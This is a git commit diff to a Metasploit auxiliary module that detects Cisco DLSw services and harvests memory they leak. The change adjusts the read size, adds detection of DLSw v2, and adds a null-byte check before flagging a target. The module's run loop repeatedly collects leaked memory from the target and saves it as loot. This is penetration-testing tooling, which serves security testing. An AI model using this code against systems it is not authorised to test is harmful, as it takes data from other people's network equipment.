added DLSw v1 and v2 check, added check for \x00 in leak segment

bug/bundler_fix
tate 2014-12-03 23:27:11 -07:00
parent e9750e2df8
commit 3aecd3a10e
1 changed files with 14 additions and 12 deletions

View File

@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
"#{rhost}:#{rport}" "#{rhost}:#{rport}"
end end
def get_response(size = 8) def get_response(size = 72)
connect connect
response = sock.get_once(size) response = sock.get_once(size)
disconnect disconnect
@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
if response.blank? if response.blank?
vprint_status("#{peer}: no response") vprint_status("#{peer}: no response")
Exploit::CheckCode::Safe Exploit::CheckCode::Safe
elsif response[0..3] == "\x31\x48\x01\x5b" elsif response[0..1] == "\x31\x48" || response[0..1] == "\x32\x48"
vprint_good("#{peer}: Detected DLSw protocol") vprint_good("#{peer}: Detected DLSw protocol")
report_service( report_service(
host: rhost, host: rhost,
@ -71,6 +71,7 @@ class Metasploit3 < Msf::Auxiliary
) )
# TODO: check that response has something that truly indicates it is vulnerable # TODO: check that response has something that truly indicates it is vulnerable
# and not simply that it responded # and not simply that it responded
unless response[18..72].scan(/\x00/).length == 54
print_good("#{peer}: leaked #{response.length} bytes") print_good("#{peer}: leaked #{response.length} bytes")
report_vuln( report_vuln(
host: rhost, host: rhost,
@ -80,6 +81,7 @@ class Metasploit3 < Msf::Auxiliary
info: "Module #{fullname} collected #{response.length} bytes" info: "Module #{fullname} collected #{response.length} bytes"
) )
Exploit::CheckCode::Vulnerable Exploit::CheckCode::Vulnerable
end
else else
vprint_status("#{peer}: #{response.size}-byte response didn't contain any leaked data") vprint_status("#{peer}: #{response.size}-byte response didn't contain any leaked data")
Exploit::CheckCode::Safe Exploit::CheckCode::Safe
@ -92,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary
dlsw_data = '' dlsw_data = ''
until dlsw_data.length > datastore['LEAK_AMOUNT'] until dlsw_data.length > datastore['LEAK_AMOUNT']
response = get_response(72) response = get_response
dlsw_data << response[18..72] unless response.blank? dlsw_data << response[18..72] unless response.blank?
end end
loot_and_report(dlsw_data) loot_and_report(dlsw_data)